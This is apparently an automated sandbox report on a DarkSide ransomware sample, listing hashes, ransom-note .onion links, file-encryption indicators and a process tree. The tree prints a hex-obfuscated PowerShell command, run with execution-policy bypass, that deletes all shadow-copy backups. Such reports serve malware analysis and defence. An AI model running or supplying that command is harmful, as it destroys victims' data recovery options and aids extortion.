Analysis
-
max time kernel
14s -
max time network
12s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
29-05-2021 10:12
Static task
static1
Behavioral task
behavioral1
Sample
ut.bin.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
ut.bin.exe
Resource
win10v20210410
General
-
Target
ut.bin.exe
-
Size
226KB
-
MD5
c81dae5c67fb72a2c2f24b178aea50b7
-
SHA1
4bd6437cd1dc77097a7951466531674f80c866c6
-
SHA256
48a848bc9e0f126b41e5ca196707412c7c40087404c0c8ed70e5cee4a418203a
-
SHA512
30d63e080f37f34fb29fd46f8fb1572d79f645154a002c8da5914ae3d51e224bc60601f91f5d58ac2ce9f81d56a8ad467d7fde55d429ed269df3c196e6687b2c
Malware Config
Extracted
C:\\README.137cb6d5.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\LimitRepair.tif => C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\ResetUnpublish.crw => C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\SelectMount.png => C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\StepCompress.tif => C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\StepCompress.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff ut.bin.exe File renamed C:\Users\Admin\Pictures\SubmitDismount.tiff => C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 ut.bin.exe File renamed C:\Users\Admin\Pictures\EditCompress.raw => C:\Users\Admin\Pictures\EditCompress.raw.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\LimitRepair.tif.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\ResetUnpublish.crw.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SelectMount.png.137cb6d5 ut.bin.exe File opened for modification C:\Users\Admin\Pictures\SubmitDismount.tiff.137cb6d5 ut.bin.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1776 ut.bin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1776 ut.bin.exe 1776 ut.bin.exe 1776 ut.bin.exe 2040 powershell.exe 2040 powershell.exe 1776 ut.bin.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1776 ut.bin.exe Token: SeSecurityPrivilege 1776 ut.bin.exe Token: SeTakeOwnershipPrivilege 1776 ut.bin.exe Token: SeLoadDriverPrivilege 1776 ut.bin.exe Token: SeSystemProfilePrivilege 1776 ut.bin.exe Token: SeSystemtimePrivilege 1776 ut.bin.exe Token: SeProfSingleProcessPrivilege 1776 ut.bin.exe Token: SeIncBasePriorityPrivilege 1776 ut.bin.exe Token: SeCreatePagefilePrivilege 1776 ut.bin.exe Token: SeBackupPrivilege 1776 ut.bin.exe Token: SeRestorePrivilege 1776 ut.bin.exe Token: SeShutdownPrivilege 1776 ut.bin.exe Token: SeDebugPrivilege 1776 ut.bin.exe Token: SeSystemEnvironmentPrivilege 1776 ut.bin.exe Token: SeRemoteShutdownPrivilege 1776 ut.bin.exe Token: SeUndockPrivilege 1776 ut.bin.exe Token: SeManageVolumePrivilege 1776 ut.bin.exe Token: 33 1776 ut.bin.exe Token: 34 1776 ut.bin.exe Token: 35 1776 ut.bin.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeBackupPrivilege 1828 vssvc.exe Token: SeRestorePrivilege 1828 vssvc.exe Token: SeAuditPrivilege 1828 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1776 wrote to memory of 2040 1776 ut.bin.exe 26 PID 1776 wrote to memory of 2040 1776 ut.bin.exe 26 PID 1776 wrote to memory of 2040 1776 ut.bin.exe 26 PID 1776 wrote to memory of 2040 1776 ut.bin.exe 26
Processes
-
C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"C:\Users\Admin\AppData\Local\Temp\ut.bin.exe"1⤵
- Modifies extensions of user files
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828